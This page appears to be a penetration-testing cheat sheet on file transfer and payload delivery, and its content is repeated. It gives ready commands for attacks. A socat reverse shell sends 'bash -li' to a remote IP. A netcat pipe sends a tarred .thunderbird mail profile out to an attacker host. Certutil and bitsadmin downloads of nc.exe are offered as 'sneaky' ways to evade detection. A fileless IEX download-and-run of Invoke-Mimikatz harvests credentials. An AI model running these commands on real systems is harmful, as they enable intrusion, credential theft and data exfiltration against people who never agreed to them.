File Transfer

Listeners and binaries

Last updated 2 months ago

File Transfer

Listeners and binaries

Host

python3 -m http.server 443

Client

curl

curl -o IP:Port/file

wget

wget IP:Port/file

Host

nc -lvp <Local_IP> > file

Client

nc <Target_IP> <port> < file

For entire directories is good practice to use tar:

Listener

nc -lvp 4445 > .thunderbird.tar

Client

tar -cf - .thunderbird | nc 10.10.16.10 4445

With cat

cat <file> | nc Target_IP 443

Copy a file into Apache Web Directory

With the right permissions, you can copy the file to /var/www/html so it can be access from the URL http://<server-ip>/file.txt.

cp archivo.txt /var/www/html

Enable permissions

Give ownership to the web user

sudo chown www-data:www-data /var/www/html/archivo.txt

Set the file to be read by everyone

sudo chmod 644 /var/www/html/archivo.txt

Uploading via Apache (web interface)

Ensure the appropriate upload_max_filesize and post_max_size directives are set in the php.ini file.
Normally is located here /etc/php/7.x/apache2/php.ini

upload_max_filesize = 50M
post_max_size = 50M

From local machine to remote host

scp localfile username@remotehost:/path/to/destination/

From remote host to local machine

scp username@remotehost:/path/to/remotefile /local/path/

Specific Port

scp -P 47502 linpeas.sh user1@83.136.252.198:/home/user1

With key

scp -i ~/.ssh/key linpeas.sh professor@10.10.10.131:/home/professor/

From local to Apache Server

scp archivo.txt user@remote-server:/var/www/html/

Listener

socat file:`tty`,raw,echo=0 tcp-listen:4444

Target Machine

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

One liner

php -r '$file = file_get_contents("https://<snip>/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'

Windows

First, start a python web server

python3 -m http.server 443

Then

certutil.exe -f -urlcache -split http://<IP>/<file>

Sneaky Version

certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe

First, start a python web-server

python3 -m http.server 443

Then

IWR -uri http://<ip>/<file> -OutFile <file_name>

Uses Chrome User Agent

Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe"

Upload a file

Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64

First, create a SMB share folder

impacket-smbserver <share_name> <file_path> -smb2support

Then, copy the files

copy \\<ip>\share\<file> <destination_path>

curl

curl http://ip/file -o <output>

wget

wget http://ip/file -OutFile <output>

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://ip/file', '<output>')

Use Case:
- Download files stealthily.
- Evade detection, as bitsadmin is a native tool and might be overlooked by some security solutions.

bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe

Modern Version

Start-BitsTransfer -Source http://10.10.10.32/nc.exe -Destination C:\Temp\nc.exe

In-memory execution

Mimikatz

IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')

Useful binaries

PreviousAWS NextExfiltration

Last updated 2 months ago

Host

python3 -m http.server 443

Client

curl

curl -o IP:Port/file

wget

wget IP:Port/file

Host

nc -lvp <Local_IP> > file

Client

nc <Target_IP> <port> < file

For entire directories is good practice to use tar:

Listener

nc -lvp 4445 > .thunderbird.tar

Client

tar -cf - .thunderbird | nc 10.10.16.10 4445

With cat

cat <file> | nc Target_IP 443

Copy a file into Apache Web Directory

With the right permissions, you can copy the file to /var/www/html so it can be access from the URL http://<server-ip>/file.txt.

cp archivo.txt /var/www/html

Enable permissions

Give ownership to the web user

sudo chown www-data:www-data /var/www/html/archivo.txt

Set the file to be read by everyone

sudo chmod 644 /var/www/html/archivo.txt

Uploading via Apache (web interface)

Ensure the appropriate upload_max_filesize and post_max_size directives are set in the php.ini file.
Normally is located here /etc/php/7.x/apache2/php.ini

upload_max_filesize = 50M
post_max_size = 50M

From local machine to remote host

scp localfile username@remotehost:/path/to/destination/

From remote host to local machine

scp username@remotehost:/path/to/remotefile /local/path/

Specific Port

scp -P 47502 linpeas.sh user1@83.136.252.198:/home/user1

With key

scp -i ~/.ssh/key linpeas.sh professor@10.10.10.131:/home/professor/

From local to Apache Server

scp archivo.txt user@remote-server:/var/www/html/

Listener

socat file:`tty`,raw,echo=0 tcp-listen:4444

Target Machine

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

One liner

php -r '$file = file_get_contents("https://<snip>/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'

Windows

First, start a python web server

python3 -m http.server 443

Then

certutil.exe -f -urlcache -split http://<IP>/<file>

Sneaky Version

certutil.exe -verifyctl -split -f http://10.10.10.32/nc.exe

First, start a python web-server

python3 -m http.server 443

Then

IWR -uri http://<ip>/<file> -OutFile <file_name>

Uses Chrome User Agent

Invoke-WebRequest http://nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "nc.exe"

Upload a file

Invoke-WebRequest -Uri http://10.10.10.32:443 -Method POST -Body $b64

First, create a SMB share folder

impacket-smbserver <share_name> <file_path> -smb2support

Then, copy the files

copy \\<ip>\share\<file> <destination_path>

curl

curl http://ip/file -o <output>

wget

wget http://ip/file -OutFile <output>

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://ip/file', '<output>')

Use Case:
- Download files stealthily.
- Evade detection, as bitsadmin is a native tool and might be overlooked by some security solutions.

bitsadmin /transfer n http://10.10.10.32/nc.exe C:\Temp\nc.exe

Modern Version

Start-BitsTransfer -Source http://10.10.10.32/nc.exe -Destination C:\Temp\nc.exe

In-memory execution

Mimikatz

IEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')

Client

Copy a file into Apache Web Directory

Uploading via Apache (web interface)

Windows

Use Case:

In-memory execution

Useful binaries

Client

Copy a file into Apache Web Directory

Uploading via Apache (web interface)

Windows

Use Case:

In-memory execution

Useful binaries